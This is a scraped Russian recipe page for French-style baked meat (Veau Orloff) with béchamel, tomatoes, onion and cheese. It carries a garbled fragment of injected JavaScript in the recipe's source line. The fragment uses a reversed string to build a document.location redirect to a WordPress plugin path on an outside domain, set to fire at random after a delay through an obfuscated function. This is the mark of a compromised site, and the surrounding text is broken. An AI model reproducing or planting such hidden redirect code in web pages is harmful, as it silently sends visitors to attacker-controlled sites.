Рецепт дня: мясо по-французски

Впервые приготовленное для фаворита императрицы Екатерины II блюдо называлось Veau Orloff, что в переводе означает «телятина по-орловски». Как сделать это сытное и знакомое всем блюдо более полезным — в нашем материале.

Со времён графа Орлова блюдо, конечно, претерпело немало изменений — из первоначального рецепта исключили грибы, телятину стали заменять свининой, а вместо соуса использовать майонез, из-за чего многие считают мясо по-французски крайне неполезным и стараются исключить из своего рациона. Мы представим вам облегчённый вариант любимого блюда.

Рецепт дня: мясо по-французски. Изображение номер 1

Фото: pinterest.com

Рецепт дня: мясо по-французски

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

35—45 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

3-4

КАЛОРИЙНОСТЬ:

не указана

0 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Телятина (можно заменить свининой)

500 г

Помидоры

2—3 шт.

Репчатый лук

2 шт.

Пармезан (или любой другой твёрдый сыр)

150 г

Сливочное масло

50 г

Мука

2 ст. л.

Сливки (22% жирности)

400 мл

Мускатный орех

щепотка

Соль

по вкусу

Чёрный молотый перец

по вкусу

  1. Приготовьте соус «Бешамель». Растопите сливочное масло, обжарьте в масле муку, постоянно помешивая. Когда мука приобретёт золотистый оттенок, медленно влейте холодные сливки. Посолите и добавьте мускатный орех. Затем кипятите на медленном огне, пока соус не начнёт густеть. Тогда снимите его с огня и остудите.
  2. Нарежьте мясо поперёк волокон ломтиками толщиной 1—1,5 см и немного их отбейте.
  3. Нарежьте помидоры тонкими кружочками, а репчатый лук — полукольцами.
  4. На дно формы для запекания налейте немного соуса, выложите слой мяса, смажьте его соусом и положите сверху лук. Слегка посолите и поперчите.
  5. Выложите поверх мяса и лука кружочки помидоров.
  6. Сверху вылейте оставшийся соус «Бешамель» и поставьте в духовку.
  7. За 10 минут до готовности посыпьте блюдо натёртым сыром и снова поставьте в духовку.
  8. Блюдо рекомендуем подавать горячим, со свежими овощами.
Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector